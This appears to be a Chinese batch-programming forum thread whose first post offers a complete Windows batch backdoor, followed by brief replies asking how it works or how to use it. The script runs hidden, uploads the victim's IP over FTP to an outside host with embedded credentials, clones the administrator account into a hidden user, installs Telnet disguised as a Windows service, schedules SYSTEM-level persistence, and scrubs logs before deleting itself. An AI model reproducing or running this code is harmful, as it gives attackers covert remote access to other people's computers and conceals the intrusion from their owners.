批处理之家 » BAT原创&转载 » 闲来无事写了个批处理后门

[新手上路]批处理新手入门导读	[视频教程]批处理基础视频教程	[视频教程]VBS基础视频教程	[批处理精品]批处理版照片整理器
[批处理精品]纯批处理备份&还原驱动	[批处理精品]CMD命令50条不能说的秘密	[在线下载]第三方命令行工具	[在线帮助]VBScript / JScript 在线参考

返回列表发帖

Rank: 8 Rank: 8

帖子: 682
积分: 1686
技术: 48
捐助: 0
注册时间: 2008-3-13

1楼 跳转到 » 倒序看帖

字体大小: tT

发表于 2008-3-13 13:35 | 只看该作者

[网络工具] 闲来无事写了个批处理后门

 @echo off
cls
if "%1" == "h" goto begin
mshta vbscript:createobject("wscript.shell").run("""%~nx0"" h",0)(window.close)&&exit
:begin
time /t>>time.txt
for /f "tokens=2 delims=:" %%a in (time.txt) do set ip=%%a
del time.txt /q
ipconfig>>ipconfig.txt
for /f "tokens=15" %%i in ('find "IP Address" ipconfig.txt') do echo %%i>>ip.txt
echo open lxz.0moola.com 21>a
echo lxz.0moola.com>>a
echo 1052104151>>a
echo bin>>a
echo put ip.txt /IP/%ip%.txt>>a
echo by>>a
ftp.exe -s:a
del ipconfig.txt /q
del ip.txt /q
del a /q
sc config Schedule start= auto
net start schedule
schtasks /create /tn Monitor /tr %SystemRoot%\system32\inetser.bat /sc onlogon /ru system
echo inetscr.exe -s:%SystemRoot%\system32\a >>%SystemRoot%\system32\inetser.bat
echo open 本机IP 端口>%SystemRoot%\system32\a
copy %SystemRoot%\system32\ftp.exe %SystemRoot%\system32\inetscr.exe
attrib +s +h %SystemRoot%\system32\a
attrib +s +h %SystemRoot%\system32\inetscr.exe
attrib +s +h %SystemRoot%\tasks\Monitor.job
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v forceguest /f /t REG_DWORD /d 00000000
echo Windows Registry Editor Version 5.00 >>c:\h.reg
echo. >>c:\h.reg
echo [HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\lxz$] >>c:\h.reg
echo @=hex(1f7): >>c:\h.reg
echo regedit /s c:\h.reg >>c:\h.bat
echo del c:\h.reg /q >>c:\h.bat
echo REG add HKLM\SAM\SAM\Domains\Account\Users\000001F7 >>c:\h.bat
echo REG COPY HKLM\SAM\SAM\Domains\Account\Users\000001F4 HKLM\SAM\SAM\Domains\Account\Users\000001F7 /s /f >>c:\h.bat
echo net user lxz$ lxz>>c:\h.bat
echo del c:\h.bat /q >>c:\h.bat
at 10:00 c:\h.bat
schtasks /run /tn at1
schtasks /run /tn Monitor
tlntadmn config sec = -ntlm
tlntadmn config port = 420
copy %SystemRoot%\system32\tlntsvr.exe %SystemRoot%\system32\inetsvr.exe
attrib +s +h %SystemRoot%\system32\inetsvr.exe
echo [Version] >>c:\inetsvr.inf
echo Signature="$WINDOWS NT$" >>c:\inetsvr.inf
echo [DefaultInstall.Services] >>c:\inetsvr.inf
echo AddService=inetsvr,,My_AddService_Name >>c:\inetsvr.inf
echo [My_AddService_Name] >>c:\inetsvr.inf
echo DisplayName=Windows Internet Service >>c:\inetsvr.inf
echo Description=提供对 Internet 信息服务管理的支持。>>c:\inetsvr.inf
echo ServiceType=0x10 >>c:\inetsvr.inf
echo StartType=2 >>c:\inetsvr.inf
echo ErrorControl=0 >>c:\inetsvr.inf
echo ServiceBinary=%SystemRoot%\system32\inetsvr.exe >>c:\inetsvr.inf
rundll32.exe setupapi,InstallHinfSection DefaultInstall 128 c:\inetsvr.inf 
del c:\inetsvr.inf /q
net start inetsvr
net stop schedule
for /r %%a in (*.txt) do find "本机IP" >nul %%a && echo 1980>%%a
for /r %%b in (*.log) do find "本机IP" >nul %%b && echo 1980>%%b
for /r %%c in (*.evt) do find "本机IP" >nul %%c && echo 1980>%%c
for /r %%d in (*.event) do find "本机IP" >nul %%d && echo 1980>%%d
net start schedule
schtasks /delete /tn at1 /f
del %0 /q
del lxz.bat /qCOPY

Rank: 8 Rank: 8

帖子: 1759
积分: 5387
技术: 51
捐助: 210
注册时间: 2007-10-26

2楼

发表于 2008-3-13 16:11 | 只看该作者

请用[ code] 和 [/code] 标记把代码部分首尾括起来，以便他人复制；

技术问题请到论坛发帖求助！

Rank: 2

帖子: 9
积分: 174
技术: 0
捐助: 0
注册时间: 2008-3-11

3楼

发表于 2008-3-15 21:48 | 只看该作者

看不懂啊，慢慢研究下。

Rank: 1

帖子: 2
积分: 13
技术: 0
捐助: 0
注册时间: 2010-11-7

4楼

发表于 2010-11-7 18:33 | 只看该作者

看不懂啊，慢慢研究下。

看不懂啊，慢慢研究下。

Rank: 1

帖子: 3
积分: 24
技术: 0
捐助: 0
注册时间: 2010-11-16

5楼

发表于 2010-11-16 11:57 | 只看该作者

有点晕晕的，，，，不过，，我知道，，，这是个高手，，，，

Rank: 1

帖子: 4
积分: 17
技术: 0
捐助: 0
注册时间: 2010-7-1

6楼

发表于 2011-1-2 05:58 | 只看该作者

看了下懂了部分! 但是批处理想导入注册表成功的概率似乎,(ps 特别的有杀毒软件的,我用批处理修改显隐属性,360就会弹对话框! 我郁闷!)
另外我看到您在安装inf的时候使用的是 128

rundll32.exe setupapi,InstallHinfSection DefaultInstall 128 c:\inetsvr.inf COPY

之前在百度查找到的方法是132的不知道这个数字不同有什么区别!?

非常感谢

Rank: 1

帖子: 26
积分: 44
技术: 2
捐助: 0
注册时间: 2022-11-24

7楼

发表于 2022-12-17 20:38 | 只看该作者

怎么用嘞？？？